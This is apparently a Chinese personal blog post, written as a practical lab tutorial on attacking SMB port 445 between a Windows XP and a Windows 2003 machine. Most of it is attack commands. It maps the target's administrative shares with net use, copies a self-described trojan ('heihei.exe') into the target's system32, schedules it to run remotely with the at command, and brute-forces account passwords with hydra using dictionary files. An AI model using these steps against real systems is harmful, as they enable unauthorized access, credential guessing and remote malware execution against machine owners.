返回顶部

Smb(445)暴力破解与利用(实操)

工具

xp一台,ip:192.168.40.122

win2003一台 , ip:192.168.0.116

一、小技巧。

探测端口开没开着,telnet ip 端口,跳出黑框代表开着了。平常用工具探测。

二、用xp链接2003的c$映射到xp的k盘。

net share 可以看到目标开启了哪些共享文件。

net use \\192.168.0.116\c$,然后输入目标的账号和密码,就能连接上了。可以当网盘使用。

这样就能把目标的共享资源映射到本地了,这里是分别映射了c$d$与share,为kjl盘。不知道为啥f盘不行。

三、取消盘符映射

net use 盘符 /del或者取消所有net use * /del

四、ipc$连接后可自由选择传文件到哪并执行。

1、net use \\192.168.0.116\ipc$

2、制作木马并植入木马copy d:\heihei.exe \\192.168.0.116\c$\windows\system32\ // 把本地d盘下的文件复制到目标的c盘\windows\system32\ 下。

3、定时上线:net time \\192.168.0.116 //查看目标机器的系统时间

at \\192.168.0.116 时间(例如16:49)"c: \windows\system32\heihei.exe"

at \\192.168.0.116查看待运行任务。

四、暴力破解目标账号密码

可用工具:NTscan,hydra

hydra.exe -l administrator -P e:\pass.txt 192.168.0.116 telnet //爆破密码

hydra.exe -l 账号 -P 密码本 ip 协议(ftp、smb)

hydra.exe -L 账号字典 -P 密码字典192.168.0.116 telnet

posted @ 2020-12-02 20:33  11阳光  阅读(6565)  评论(0编辑  收藏  举报